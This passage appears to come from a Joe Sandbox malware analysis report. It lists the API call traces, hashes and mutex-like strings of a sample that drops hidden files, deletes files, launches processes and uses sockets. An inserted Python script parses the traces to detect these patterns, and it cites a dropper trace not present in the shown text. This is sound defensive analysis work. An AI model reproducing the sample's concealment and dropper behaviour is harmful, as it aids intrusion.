• Opcode Fuzzy Hash: a4a7dc642370d7071dbea88f2ba4310cecfbf74c713a9dcdf868063a0e44ce81
• Instruction Fuzzy Hash: EE116375620348FFDB20CFA8D889B9D7B79AB44711F508654FA05D62C1D670AA808B58
APIs
• lstrcpy.KERNEL32(00000000,?), ref: 0128A220
• GetFileAttributesA.KERNEL32(00000000), ref: 0128A236
• DeleteFileA.KERNEL32(00000000), ref: 0128A24A
• Sleep.KERNEL32(00002800), ref: 0128A255
• RtlExitUserThread.NTDLL(00000000), ref: 0128A25F
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: File$AttributesDeleteExitSleepThreadUserlstrcpy
• String ID:
• API String ID: 1172011736-0
• Opcode ID: 5bf5046ce5efe61ed63e8451a91ddb72e3f3427ce4d15d05d4735c6ac2892537
• Instruction ID: 9ff8697f2ae112ffdc6517dd43238817c446780e1c0029e03902fc0281c95179
• Opcode Fuzzy Hash: 5bf5046ce5efe61ed63e8451a91ddb72e3f3427ce4d15d05d4735c6ac2892537
• Instruction Fuzzy Hash: C0F02835910214ABEB309BB8E84CBA6B778BF84301F0082A6E612C21D5DF72A5148B51
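The two routines above (a file created with GENERIC_WRITE, CREATE_ALWAYS and attributes 0x22 and written from a memory buffer, then a file deleted followed by Sleep and a thread exit) are easier to read once the raw CreateFileA arguments are decoded and the call sequences are matched automatically. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses API entries in the shape the report prints them, names the CreateFileA constants, and flags both sequences. The two traces are copied from the entries above and embedded as constructed input; the sequence window, finding fields and function names are the example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the API entries of the two routines above, in the
# shape Joe Sandbox prints them ("Api.MODULE(args), ref: ADDRESS").
DROPPER_TRACE = """\
• lstrlen.KERNEL32(?), ref: 01290C6E
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000022,00000000), ref: 01290CA0
• WriteFile.KERNEL32(?,00F423D8,0001E200,?,00000000), ref: 01290CC6
• CloseHandle.KERNEL32(?), ref: 01290CD0
• GetFileAttributesA.KERNEL32(?), ref: 01290CDA
"""

DELETE_TRACE = """\
• lstrcpy.KERNEL32(00000000,?), ref: 0128A220
• GetFileAttributesA.KERNEL32(00000000), ref: 0128A236
• DeleteFileA.KERNEL32(00000000), ref: 0128A24A
• Sleep.KERNEL32(00002800), ref: 0128A255
• RtlExitUserThread.NTDLL(00000000), ref: 0128A25F
"""

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the sandbox printed "?"
    ref: int                   # address of the call site

# Bullet and whitespace are tolerated; the argument list is optional (wsprintfA has none).
LINE_RE = re.compile(
    r"^[\s•]*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args: List[Optional[int]] = []
        if m.group("args"):
            for tok in m.group("args").split(","):
                tok = tok.strip()
                args.append(None if tok == "?" else int(tok, 16))
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

# Win32 constants for the three CreateFileA arguments that carry intent.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRIBUTES = {0x01: "FILE_ATTRIBUTE_READONLY", 0x02: "FILE_ATTRIBUTE_HIDDEN",
                   0x04: "FILE_ATTRIBUTE_SYSTEM", 0x20: "FILE_ATTRIBUTE_ARCHIVE",
                   0x80: "FILE_ATTRIBUTE_NORMAL"}

def decode_create_file(call: ApiCall) -> dict:
    """Name dwDesiredAccess (arg 1), dwCreationDisposition (arg 4) and
    dwFlagsAndAttributes (arg 5) of a CreateFileA call."""
    access, disposition, flags = call.args[1], call.args[4], call.args[5]
    return {
        "access": [n for bit, n in GENERIC_ACCESS.items() if access is not None and access & bit],
        "disposition": CREATION.get(disposition, "?"),
        "attributes": [n for bit, n in FILE_ATTRIBUTES.items() if flags is not None and flags & bit],
    }

def _next(calls: List[ApiCall], start: int, names, window: int = 4) -> int:
    """Index of the first call named in `names` within `window` calls after `start`, else -1."""
    for i in range(start + 1, min(start + 1 + window, len(calls))):
        if calls[i].api in names:
            return i
    return -1

def find_hidden_drop(calls: List[ApiCall]) -> list:
    """CreateFileA(GENERIC_WRITE, ..., FILE_ATTRIBUTE_HIDDEN) -> WriteFile -> CloseHandle:
    a file written from an in-memory buffer and hidden from directory listings."""
    findings = []
    for i, c in enumerate(calls):
        if c.api != "CreateFileA" or len(c.args) < 6:
            continue
        d = decode_create_file(c)
        if "GENERIC_WRITE" not in d["access"] or "FILE_ATTRIBUTE_HIDDEN" not in d["attributes"]:
            continue
        w = _next(calls, i, {"WriteFile"})
        if w == -1 or _next(calls, w, {"CloseHandle"}) == -1:
            continue
        findings.append({"ref": c.ref, "bytes": calls[w].args[2],
                         "disposition": d["disposition"], "attributes": d["attributes"]})
    return findings

def find_delete_and_exit(calls: List[ApiCall]) -> list:
    """DeleteFileA -> Sleep -> thread exit: a file removed, then the thread pauses and ends."""
    findings = []
    for i, c in enumerate(calls):
        if c.api != "DeleteFileA":
            continue
        s = _next(calls, i, {"Sleep"})
        if s == -1 or _next(calls, s, {"RtlExitUserThread", "ExitThread"}) == -1:
            continue
        findings.append({"ref": c.ref, "sleep_ms": calls[s].args[0]})
    return findings

if __name__ == "__main__":
    for label, trace in (("drop", DROPPER_TRACE), ("delete", DELETE_TRACE)):
        calls = parse_trace(trace)
        print(label, find_hidden_drop(calls), find_delete_and_exit(calls))
```

Run against the first trace this reports a 0x1E200-byte write to a file created with CREATE_ALWAYS and FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_ARCHIVE at 0x01290CA0; against the second it reports the DeleteFileA at 0x0128A24A followed by a 10240 ms Sleep and RtlExitUserThread. The window of four calls is a guess that fits these two functions; widen it when the sandbox interleaves string handling between the interesting calls.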
APIs
• lstrcpy.KERNEL32(?,?), ref: 012846EE
• lstrlen.KERNEL32(?), ref: 012846FB
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0128476E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CreateProcesslstrcpylstrlen
• String ID: D
• API String ID: 2742767947-2746444292
• Opcode ID: 33398fecb908110d93acd8f0a8ddaed2c1b754431e5ecbe5a6dce116e53bdb02
• Instruction ID: 9b454e7b71fb4a95cd3cfeb0c70500a248620258c2a3f6450fca3176268e74e7
• Opcode Fuzzy Hash: 33398fecb908110d93acd8f0a8ddaed2c1b754431e5ecbe5a6dce116e53bdb02
• Instruction Fuzzy Hash: E4314FB190426CDFDB64DF54CC587DABBB4AB55304F0081D9D28DAB280DBB51AC48F80
APIs
• wsprintfA.USER32 ref: 01285AF0
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01285B2D
• RegCloseKey.KERNEL32(00000000), ref: 01285BFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CloseQueryValuewsprintf
• String ID: %c%d_%d$fronC:\Windows\
• API String ID: 2691868063-3771101883
• Opcode ID: f3d55af2b26bf868c09e5f13b9d828dccfeac75864b396d9b0b9f9eb0f180072
• Instruction ID: b9bb7cad48fde28544c9f8c263c308ff2af312a5007384b37018761eafca486c
• Opcode Fuzzy Hash: f3d55af2b26bf868c09e5f13b9d828dccfeac75864b396d9b0b9f9eb0f180072
• Instruction Fuzzy Hash: 40112B74911228EBDB24DF94EC88BE9B7B4BB58304F1481CDD20A66285D7749FC4CF54
APIs
• wsprintfA.USER32 ref: 01285AF0
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01285B2D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: QueryValuewsprintf
• String ID: %c%d_%d$fronC:\Windows\
• API String ID: 2072284396-3771101883
• Opcode ID: 5d26f03dc4fae02c76bc66df3df5296c784dde92963fe821581668481f039541
• Instruction ID: 3f0c8b7be57cbf3435f6d4b51a4d2876a1d009bc4f4704aa90081f40b0eb4699
• Opcode Fuzzy Hash: 5d26f03dc4fae02c76bc66df3df5296c784dde92963fe821581668481f039541
• Instruction Fuzzy Hash: 310121B5951128EBDB20DF95EC8CBE9B3B8BB58304F1081CCE209A6284D774ABC4CF54
APIs
• htons.WS2_32(?), ref: 01288317
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128834E
                                                                                                                                                                                                                                      • Part of subcall function 01287C4E: socket.WS2_32(00000002,00000001,00000006), ref: 01287C83
                                                                                                                                                                                                                                    • send.WS2_32(00000000,00000000,00000008,00000000), ref: 01288389
                                                                                                                                                                                                                                      • Part of subcall function 0128811C: GlobalAlloc.KERNEL32(00000040,-00000C00), ref: 012881A1
                                                                                                                                                                                                                                      • Part of subcall function 0128811C: recv.WS2_32(?,00000008,00000400,00000000), ref: 012881F0
                                                                                                                                                                                                                                      • Part of subcall function 0128811C: GlobalFree.KERNEL32(00000000), ref: 01288247
                                                                                                                                                                                                                                      • Part of subcall function 0128811C: closesocket.WS2_32(000000FF), ref: 01288283
                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 012883BE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Globalclosesocket$AllocCountExchangeFreeInterlockedTickhtonsrecvsendsocket
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1332007968-0
                                                                                                                                                                                                                                    • Opcode ID: ed22ad436a89bf41b45a52553dec426664d0afc0e58596d72b05cc50f83aebd6
                                                                                                                                                                                                                                    • Instruction ID: c0252f98fad0d6a32cb54f05a2e4ee14f5d9454096125141d6767f17d1bf8bbb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed22ad436a89bf41b45a52553dec426664d0afc0e58596d72b05cc50f83aebd6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56219F71D112199BEB20DB78DC0ABEDB7B5BF44300F0446E9E20CE62D1EB744A959F51
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 012845E3
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000020,00000000), ref: 012845FC
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0128461D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 01284627
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateDeleteHandleWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 656945655-0
                                                                                                                                                                                                                                    • Opcode ID: eea1a4f8bdf54f36c89f02b4f8959e111913caabc134eb71aaf6e19eb69519fd
                                                                                                                                                                                                                                    • Instruction ID: c3c28bd3d3a21dace8723da2ae6eeda0d85d3b163f0e2345d97a2a5cb803b51a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eea1a4f8bdf54f36c89f02b4f8959e111913caabc134eb71aaf6e19eb69519fd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F012B5640308FBDB20DFE4EC4DF9E7B78AB48711F108684FA05AB2D4D670AA549B50
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 012880DA
                                                                                                                                                                                                                                    • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 012880F5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: recvselect
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 741273618-2766056989
                                                                                                                                                                                                                                    • Opcode ID: b52e1ad9f8bf59aac751911893ed6ef94c84b0958f445a767e52f9e193536ce3
                                                                                                                                                                                                                                    • Instruction ID: 6c59c8b2a326ecaefdc4e019c3b75e62ad29838ca3a123c8df87c5b4767d9426
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b52e1ad9f8bf59aac751911893ed6ef94c84b0958f445a767e52f9e193536ce3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20413870A1121CDBEB29DF08C891BEDB7B5AF94304F508099E609A7280CBB46EC1CF91
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285153
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0128518F
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000400), ref: 012851D1
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0128543A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: QueryValue$Closewsprintf
                                                                                                                                                                                                                                    • String ID: fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 3301640424-3143526458
                                                                                                                                                                                                                                    • Opcode ID: 11f12f59815a10cfbd9c37a4f40d8a94c1e4d30f868d87954c36d63f12e29678
                                                                                                                                                                                                                                    • Instruction ID: a3344363aeb22d46dc6ef3a97b1ce7ae876ce64286da9c0fa57b13d4204a6aaa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11f12f59815a10cfbd9c37a4f40d8a94c1e4d30f868d87954c36d63f12e29678
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF049719221289BDB30EB54DD84FE9F378FB54705F0841D8F629A6184CB32ABA8CF54
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000001D.00000002.2666415119.0000000002410000.00000040.00000001.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_2410000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction ID: bf585241f81259111fae959ba8dbdfb80536dd17e6700cac6013d8a8c563a66b
• Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction Fuzzy Hash: DC617E71640288ABEF11DF60CC48FEA3768EB04705F041516EE09BE2E0D7B5A684CB5E
Memory Dump Source
• Source File: 0000001D.00000002.2666415119.0000000002410000.00000040.00000001.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_2410000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: d1e73c8610792a9a3e156b6f8460262f42bb90fff4ba61d025b97f7167c933e3
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: D4B14871A002898FEF10CF64CD44BAA37A5FF54304F485926DD0DAF3A1D375AA95CB4A
Strings
Memory Dump Source
• Source File: 0000001D.00000002.2666415119.0000000002410000.00000040.00000001.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_2410000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
• Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction ID: 277bba1b1824b6642ad0161d91f834ac07e413a2f6b2ed87ea8b722040acf028
• Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction Fuzzy Hash: 6E111E31240388ABEF15DEA08D4DFEA37A8AB44B05F045415BE09EE1E0DBB19644872B
Strings
Memory Dump Source
• Source File: 0000001E.00000002.2664952556.0000000002290000.00000040.00000001.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_2290000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction ID: 4848a519640b09f7fda90544f4e52f883db83ce0b3dbcfe0681fef718d908128
• Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction Fuzzy Hash: 5361477165038DABEF10DFA0CC89FAA3769EB04B05F440515EE09BE1F4D7B1A7448B6A
Memory Dump Source
• Source File: 0000001E.00000002.2664952556.0000000002290000.00000040.00000001.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_2290000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: feb9bcb35e72d87f2bce88f93b2dc91b0d0647a05ee87e375b209279c9b663a9
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: 04B11971A1028E8FEF10CF64CC44BE937A5FF44314F484925DD09AF2A5D376AA94CB8A
Strings
Memory Dump Source
• Source File: 0000001E.00000002.2664952556.0000000002290000.00000040.00000001.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_2290000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
• Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction ID: bb8fd5b6784410119b57dc3540630429bd7e0afb706686ed328c6c9965dedbe9
• Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction Fuzzy Hash: 57111B31650289ABEF10DEE08D4DFED37A8AB84B05F040414BA09EE0E4DBB19344872B
Strings
Memory Dump Source
• Source File: 0000001F.00000002.2658967564.0000000000950000.00000040.00000001.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_950000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction ID: 56eabf399a8e181e28e5dc21f5c89752777b8ecd54d50d5b662413c3927b29c0
• Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction Fuzzy Hash: F3616F71644388ABEF10DF61CC49FEA3768EF84702F544515EE09BE1E0D6B1A648CB5B
Memory Dump Source
• Source File: 0000001F.00000002.2658967564.0000000000950000.00000040.00000001.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_950000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: 53ea117c908828f6be91ff605c26371c1ac0229357233d4f6c995be8296cb5d5
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: 8CB14C71A002898FEF10CF25CC44BA937A9FF84305F484925DD0DAF2A1D375AA98CF4A
Strings
Memory Dump Source
• Source File: 0000001F.00000002.2658967564.0000000000950000.00000040.00000001.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_950000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
• Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction ID: 9c30e61e26d3b271ce6cddbdbac14861d2e7fb87b2a36a44560fd2c3f3acc363
• Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction Fuzzy Hash: 63111E31244288ABEF10DEA18D4DFD937ACAB84B02F040414BE09EE0E0DAB19644872B
Strings
Memory Dump Source
• Source File: 00000020.00000002.2652853468.0000000000BF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_bf0000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction ID: f6fb469f49f4b2f5520c19507104f0ce156ecaa7301f3e97654670511a8fb881
• Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction Fuzzy Hash: FA615E7165028CABEF10EF60CC89FAA37A8EB04701F544555FF09BF1F1D6B156488B6A
Memory Dump Source
